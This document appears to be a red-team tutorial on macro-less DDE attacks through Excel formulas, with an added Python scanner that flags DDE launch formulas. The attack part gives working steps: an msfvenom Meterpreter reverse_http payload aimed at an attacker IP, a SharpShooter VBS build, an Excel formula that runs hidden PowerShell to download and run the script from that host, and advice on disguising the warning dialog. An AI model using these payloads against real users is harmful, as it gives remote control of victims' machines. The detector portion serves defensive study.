DDE Auto - Microsoft Office Word/Excel

Macro-less Client Side Attack

This attack has been tested on the latest Windows 10 LTSC edition with Microsoft Office 365 and up-to-date Windows Defender.

Requirements:

For this attack to succeed, the Enable Dynamic Data Exchange Launch setting needs to be enabled.

Warning presented to the user who opens the worksheet:

CMD.EXE can be changed to something more pleasant, such as MSEXCEL.

Inserted command in Excel function:

=cmd|'/c cmd.exe /c calc.exe'!'A1'
Calc popped - possibility of code execution - give me a meterpreter shell!

Now that we have confirmed that code execution is possible, it is time to see how far this vulnerability can be taken. The objective is to obtain a Meterpreter shell.

First, generate msfvenom shellcode:

msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=192.168.1.108 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f raw -o raw3.txt

Change the values of -a (architecture), LHOST (attacker IP) and LPORT (attacker port) according to your setup.

Create a malicious VBS script with SharpShooter, embedding the raw3.txt shellcode file generated earlier:

python2 SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo2 --rawscfile raw3.txt --amsi amsienable

And inject the command into a Microsoft Excel function:

=cmd|'/c cmd.exe /c powershell.exe -nop -w hidden iwr -outf %tmp%\\msf.vbs http://192.168.1.108:8000/foo2.vbs & %tmp%\\msf.vbs'!'A1'
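As an added defender-side example (not part of the original post), the following Python scans spreadsheet cell formulas for the DDE launch syntax used above (=SERVER|'TOPIC'!'ITEM') and raises the severity when the topic carries launcher or downloader indicators. The cell contents are constructed samples; the MSEXCEL cell only illustrates the server-name substitution mentioned earlier and is not a working formula.

```python
import re
from dataclasses import dataclass, field

# Excel DDE launch syntax: =SERVER|'TOPIC'!'ITEM'. The server is the application
# Excel will start (cmd, MSEXCEL, ...); the topic is the argument string it gets.
DDE_RE = re.compile(
    r"^\s*=\s*(?P<server>[A-Za-z0-9_.]+)\s*\|\s*'?(?P<topic>[^!]*?)'?\s*!\s*'?[^']*'?\s*$"
)

# Topic substrings that point at a shell or downloader rather than a data server.
LAUNCHER_HINTS = ("cmd.exe", "powershell", "mshta", "wscript", "cscript",
                  "/c ", "iwr ", "http://", "https://", "%tmp%")

# Constructed sample cells (not from a real workbook): the two formulas shown on
# this page, two benign formulas, and an illustrative MSEXCEL server-name variant.
SAMPLE_CELLS = {
    "A1": "=cmd|'/c cmd.exe /c calc.exe'!'A1'",
    "B2": "=SUM(A1:A10)",
    "C3": r"=cmd|'/c cmd.exe /c powershell.exe -nop -w hidden iwr -outf %tmp%\\msf.vbs "
          r"http://192.168.1.108:8000/foo2.vbs & %tmp%\\msf.vbs'!'A1'",
    "D4": "=MSEXCEL|'/c calc.exe'!'A1'",
    "E5": '=HYPERLINK("https://example.invalid")',
}

@dataclass
class Finding:
    cell: str
    server: str
    topic: str
    hints: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Any DDE launch is worth a look; launcher hints in the topic make it high.
        return "high" if self.hints else "medium"

def scan_cells(cells):
    """Return a Finding for every cell whose formula is a DDE launch."""
    findings = []
    for cell, formula in cells.items():
        m = DDE_RE.match(formula)
        if not m:
            continue
        topic = m.group("topic")
        hints = [h for h in LAUNCHER_HINTS if h in topic.lower()]
        findings.append(Finding(cell, m.group("server"), topic, hints))
    return findings

if __name__ == "__main__":
    for f in scan_cells(SAMPLE_CELLS):
        print(f"{f.cell}: severity={f.severity} server={f.server} hints={f.hints}")
```

The regex keys on the pipe/bang launch syntax rather than on the server name, so renaming cmd to MSEXCEL, as the post suggests, still triggers a finding.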

After the user skips the warning we get a meterpreter shell: